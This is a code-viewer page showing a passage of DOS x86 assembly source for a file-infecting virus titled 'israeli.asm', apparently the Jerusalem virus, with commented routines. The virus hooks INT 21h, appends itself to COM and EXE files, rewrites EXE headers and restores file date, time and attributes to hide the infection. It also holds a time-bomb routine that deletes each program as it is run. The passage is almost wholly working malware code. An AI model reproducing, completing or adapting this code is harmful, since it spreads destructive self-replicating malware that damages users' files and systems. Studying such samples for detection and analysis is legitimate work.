📄 israeli.asm
字号:
MOV DS,AX ;02C9 8ED8
MOV SI,DX ;02CB 8BF2
MOV DI,DX ;02CD 8BFA
MOV BP,ES ;02CF 8CC5
MOV BX,CS:[002F] ;02D1 2E8B1E2F00
OR BX,BX ;02D6 0BDB
JE 02ED ;02D8 7413
MOV CX,8000 ;02DA B90080
REP MOVSW ;02DE A5
ADD AX,1000 ;02DF 050010
ADD BP,1000 ;02E2 81C50010
MOV DS,AX ;02E6 8ED8
MOV ES,BP ;02E8 8EC5
DEC BX ;02EA 4B
JNE 02DA ;02EB 75ED
MOV CX,CS:[002D] ;02ED 2E8B0E2D00
REP MOVSB ;02F3 A4
POP AX ;02F4 58
PUSH AX ;02F5 50
ADD AX,0010 ;02F6 051000
ADD CS:[0029],AX ;02F9 2E01062900
ADD CS:[0025],AX ;02FE 2E01062500
MOV AX,CS:[0021] ;0303 2EA12100
POP DS ;0307 1F
POP ES ;0308 07
MOV SS,CS:[0029] ;0309 2E8E162900
MOV SP,CS:[0027] ;030E 2E8B262700
JMP far CS:[0023] ;0313 2EFF2E2300
;
;---------------------------------------;
; IT IS TIME FOR THIS FILE TO DIE... ;
; THIS IS WHERE IT GETS DELETED ! ;
;---------------------------------------;
N21_5A: XOR CX,CX ;
MOV AX,4301H ;
INT 21H ;CHANGE FILE MODE (ATT=0)
;
MOV AH,41H ;
INT 21H ;DELETE A FILE
;
MOV AX,4B00H ;LOAD AND EXECUTE A PROGRAM
POPF ; (OUR PUSHF)
JMP far CS:[OLD_21] ;
;
;---------------------------------------;
; START INFECTION ;
;---------------------------------------;
N21_50: CMP Byte ptr CS:[TIME_BOMB],1 ;032C ;IF TIME TO DIE...
JE N21_5A ;...JUMP
;
MOV Word ptr CS:[HANDLE],-1 ;ASSUME NOT OPEN
MOV Word ptr CS:[A008F],0 ;
MOV word ptr CS:[HOST_NAME],DX ;SAVE POINTER TO FILE NAME
MOV word ptr CS:[HOST_NAME+2],DS ;
;
;INFECTION PROCESS OCCURS HERE ;
PUSH AX ;034C 50
PUSH BX ;034D 53
PUSH CX ;034E 51
PUSH DX ;034F 52
PUSH SI ;0350 56
PUSH DI ;0351 57
PUSH DS ;0352 1E
PUSH ES ;0353 06
CLD ;0354 FC
MOV DI,DX ;0355 8BFA
XOR DL,DL ;0357 32D2
CMP Byte ptr [DI+01],3A ;0359 807D013A
JNE L0364 ;035D 7505
MOV DL,[DI] ;035F 8A15
AND DL,1F ;0361 80E21F
;
L0364: MOV AH,36 ;
INT 21H ;GET DISK FREE SPACE
CMP AX,-1 ;0368 3DFFFF
JNE L0370 ;036B 7503
L036D: JMP I_90 ;036D E97702
;
L0370: MUL BX ;0370 F7E3
MUL CX ;0372 F7E1
OR DX,DX ;0374 0BD2
JNE L037D ;0376 7505
CMP AX,710H ;0378 3D1007
JC L036D ;037B 72F0
L037D: MOV DX,word ptr CS:[HOST_NAME]
PUSH DS ;0382 1E
POP ES ;0383 07
XOR AL,AL ;0384 32C0
MOV CX,41 ;0386 B94100
REPNE SCASB ;038A AE
MOV SI,word ptr CS:[HOST_NAME]
L0390: MOV AL,[SI] ;0390 8A04
OR AL,AL ;0392 0AC0
JE L03A4 ;0394 740E
CMP AL,61 ;0396 3C61
JC L03A1 ;0398 7207
CMP AL,7A ;039A 3C7A
JA L03A1 ;039C 7703
SUB Byte ptr [SI],20 ;039E 802C20
L03A1: INC SI ;03A1 46
JMP L0390 ;03A2 EBEC
;
L03A4: MOV CX,000B ;03A4 B90B00
SUB SI,CX ;03A7 2BF1
MOV DI,offset COMMAND_COM ;03A9 BF8400
PUSH CS ;03AC 0E
POP ES ;03AD 07
MOV CX,000B ;03AE B90B00
REPE CMPSB ;03B2 A6
JNE L03B8 ;03B3 7503
JMP I_90 ;03B5 E92F02
;
L03B8: MOV AX,4300H ;
INT 21H ;CHANGE FILE MODE
JC L03C4 ;03BD 7205
;
MOV CS:[HOST_ATT],CX ;03BF ;
L03C4: JC L03EB ;03C4 7225
XOR AL,AL ;03C6 32C0
MOV CS:[A004E],AL ;03C8 2EA24E00
PUSH DS ;03CC 1E
POP ES ;03CD 07
MOV DI,DX ;03CE 8BFA
MOV CX,41 ;03D0 B94100
REPNZ SCASB ;03D4 AE
CMP Byte ptr [DI-02],4D ;03D5 807DFE4D
JE L03E6 ;03D9 740B
CMP Byte ptr [DI-02],6D ;03DB 807DFE6D
JE L03E6 ;03DF 7405
INC Byte ptr CS:[A004E] ;03E1 2EFE064E00
;
L03E6: MOV AX,3D00H ;
INT 21H ;OPEN FILE READ ONLY
L03EB: JC L0447 ;
MOV CS:[HANDLE],AX ;03ED ;
;
MOV BX,AX ;MOVE TO END OF FILE -5
MOV AX,4202 ;
MOV CX,-1 ;FFFFFFFB
MOV DX,-5 ;
INT 21H ;MOVE FILE POINTER
JC L03EB ;
;
ADD AX,5 ;0400 ;
MOV CS:[A0011],AX ;?SAVE HOST SIZE
;
MOV CX,5 ;0407 ;READ LAST 5 BYTES OF HOST
MOV DX,offset A006B ;
MOV AX,CS ;
MOV DS,AX ;
MOV ES,AX ;
MOV AH,3FH ;
INT 21H ;READ FROM A FILE
;
MOV DI,DX ;0417 ;CHECK IF LAST 5 BYTES = 'MsDos'
MOV SI,offset MS_DOS ;
REPE CMPSB ;
JNE L0427 ;
MOV AH,3E ;IF == 'MsDos'...
INT 21H ;CLOSE FILE
JMP I_90 ;...PASS CONTROL TO DOS
;
L0427: MOV AX,3524 ;GET CRITICAL ERROR VECTOR
INT 21H ;GET VECTOR
MOV [OLD_24],BX ;
MOV [OLD_24+2],ES ;
;
MOV DX,offset NEW_24 ;
MOV AX,2524 ;SET CRITICAL ERROR VECTOR
INT 21H ;SET VECTOR
;
LDS DX,dword ptr [HOST_NAME];
XOR CX,CX ;
MOV AX,4301H ;
INT 21H ;CHANGE FILE MODE
L0447: JC L0484 ;
;
MOV BX,CS:[HANDLE] ;
MOV AH,3E ;
INT 21H ;CLOSE FILE
;
MOV Word ptr CS:[HANDLE],-1 ;CLEAR HANDLE
;
MOV AX,3D02 ;
INT 21H ;OPEN FILE R/W
JC L0484 ;
;
MOV CS:[HANDLE],AX ;0460 2EA37000
MOV AX,CS ;0464 8CC8
MOV DS,AX ;0466 8ED8
MOV ES,AX ;0468 8EC0
MOV BX,[HANDLE] ;046A 8B1E7000
MOV AX,5700 ;046E B80057
INT 21H ;GET/SET FILE DATE TIME
;
MOV [HOST_DATE],DX ;0473 89167400
MOV [HOST_TIME],CX ;0477 890E7600
MOV AX,4200 ;047B B80042
XOR CX,CX ;047E 33C9
MOV DX,CX ;0480 8BD1
INT 21H ;MOVE FILE POINTER
L0484: JC L04C3 ;0484 723D
;
CMP Byte ptr [A004E],00 ;0486 803E4E0000
JE L0490 ;048B 7403
JMP L04E6 ;048D EB57
;
NOP ;048F 90
L0490: MOV BX,1000 ;0490 BB0010
MOV AH,48 ;0493 B448
INT 21H ;ALLOCATE MEMORY
JNC L04A4 ;0497 730B
;
MOV AH,3E ;0499 B43E
MOV BX,[HANDLE] ;049B 8B1E7000
INT 21H ;CLOSE FILE (OBVIOUSLY)
JMP I_90 ;04A1 E94301
;
L04A4: INC Word ptr [A008F] ;04A4 FF068F00
MOV ES,AX ;04A8 8EC0
XOR SI,SI ;04AA 33F6
MOV DI,SI ;04AC 8BFE
MOV CX,710H ;04AE B91007
REP MOVSB ;04B2 A4
MOV DX,DI ;04B3 8BD7
MOV CX,[A0011] ;?GET HOST SIZE - YES
MOV BX,[70H] ;04B9 8B1E7000
PUSH ES ;04BD 06
POP DS ;04BE 1F
MOV AH,3FH ;04BF B43F
INT 21H ;READ FROM A FILE
L04C3: JC L04E1 ;04C3 721C
;
ADD DI,CX ;04C5 03F9
;
XOR CX,CX ;POINT TO BEGINNING OF FILE
MOV DX,CX ;
MOV AX,4200H ;
INT 21H ;MOVE FILE POINTER
;
MOV SI,offset MS_DOS ;04D0 BE0500
MOV CX,5 ;04D3 B90500
REP CS:MOVSB ;04D7 2EA4
MOV CX,DI ;04D9 8BCF
XOR DX,DX ;04DB 33D2
MOV AH,40H ;
INT 21H ;WRITE TO A FILE
L04E1: JC L04F0 ;
JMP L05A2 ;
;
;---------------------------------------;
; READ EXE HEADER ;
;---------------------------------------;
L04E6: MOV CX,1CH ;READ EXE HEADER INTO BUFFER
MOV DX,offset EXE_HDR ;
MOV AH,3F ;
INT 21H ;READ FILE
JC L053C ;
;
;---------------------------------------;
; TWEEK EXE HEADER TO INFECTED HSOT ;
;---------------------------------------;
MOV Word ptr [EXE_HDR+18],1984H ;SAVE HOST'S EXE HEADER INFO
MOV AX,[EXE_HDR+14] ; SS
MOV [HOST_SS],AX ;
MOV AX,[EXE_HDR+16] ; SP
MOV [HOST_SP],AX ;
MOV AX,[EXE_HDR+20] ; IP
MOV [HOST_IP],AX ;
MOV AX,[EXE_HDR+22] ; CS
MOV [HOST_CS],AX ;
MOV AX,[EXE_HDR+4] ; SIZE (IN 512 BLOCKS)
CMP Word ptr [EXE_HDR+2],0 ; SIZE MOD 512
JZ L051B ;IF FILE SIZE==0...JMP
DEC AX ;
L051B: MUL Word ptr [BLOCK_SIZE] ;
ADD AX,[EXE_HDR+2] ;
ADC DX,0 ;AX NOW = FILE SIZE
;
ADD AX,0FH ;MAKE SURE FILE SIZE IS PARA. BOUND
ADC DX,0 ;
AND AX,0FFF0H ;
MOV [HOST_SIZE],AX ;SAVE POINTER TO BEGINNING OF VIRUS
MOV [HOST_SIZE+2],DX ;
;
ADD AX,710H ;(SIZE OF VIRUS)
ADC DX,0 ;
L053C: JC L0578 ;IF > FFFFFFFF...JMP
DIV Word ptr [BLOCK_SIZE] ;
OR DX,DX ;
JE L0547 ;
INC AX ;
L0547: MOV [EXE_HDR+4],AX ;
MOV [EXE_HDR+2],DX ;
;---------------;
MOV AX,[HOST_SIZE] ;DX:AX = HOST SIZE
MOV DX,[HOST_SIZE+2] ;
DIV Word ptr [A007A] ;
SUB AX,[EXE_HEAD+8] ;SIZE OF EXE HDR
MOV [EXE_HDR+22],AX ;VALUE OF CS
MOV Word ptr [EXE_HDR+20],offset BEGIN_EXE ;VALUE OF IP
MOV [EXE_HDR+14],AX ;VALUE OF SS
MOV Word ptr [EXE_HDR+16],710H ;VALUE OF SP
;---------------;
XOR CX,CX ;POINT TO BEGINNING OF FILE (EXE HDR)
MOV DX,CX ;
MOV AX,4200H ;
INT 21H ;MOVE FILE POINTER
L0578: JC L0584 ;
;
;---------------------------------------;
; WRITE INFECTED EXE HEADER ;
;---------------------------------------;
MOV CX,1CH ;
MOV DX,offset EXE_HDR ;
MOV AH,40H ;
INT 21H ;WRITE TO A FILE
L0584: JC L0597 ;
CMP AX,CX ;
JNE L05A2 ;
;
MOV DX,[HOST_SIZE] ;POINT TO END OF FILE
MOV CX,[HOST_SIZE+2] ;
MOV AX,4200 ;
INT 21H ;MOVE FILE POINTER
L0597: JC L05A2 ;
;
;---------------------------------------;
; WRITE VIRUS CODE TO END OF HOST ;
;---------------------------------------;
XOR DX,DX ;
MOV CX,710H ;(SIZE OF VIRUS)
MOV AH,40H ;
INT 21H ;WRITE TO A FILE
;
L05A2: CMP Word ptr CS:[008F],0 ;IF...
JZ L05AE ;...SKIP
MOV AH,49H ;
INT 21H ;FREE ALLOCATED MEMORY
;
L05AE: CMP Word ptr CS:[HANDLE],-1 ;IF ...
JE I_90 ;...SKIP
;
MOV BX,CS:[HANDLE] ;RESTORE HOST'S DATE/TIME
MOV DX,CS:[HOST_DATE] ;
MOV CX,CS:[HOST_TIME] ;
MOV AX,5701H ;
INT 21H ;GET/SET FILE DATE/TIME
;
MOV AH,3EH ;
INT 21H ;CLOSE FILE
;
LDS DX,CS:[HOST_NAME] ;RESTORE HOST'S ATTRIBUTE
MOV CX,CS:[HOST_ATT] ;
MOV AX,4301H ;
INT 21H ;CHANGE FILE MODE
;
LDS DX,dword ptr CS:[OLD_24];RESTORE CRITICAL ERROR HANDLER
MOV AX,2524H ;
INT 21H ;SET VECTOR
;
I_90: POP ES ;
POP DS ;
POP DI ;
POP SI ;
POP DX ;
POP CX ;
POP BX ;
POP AX ;
POPF ; (OUR PUSHF)
JMP far CS:[OLD_21] ;PASS CONTROL TO DOS
;
;-----------------------------------------------------------------------;
; ;
;-----------------------------------------------------------------------
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -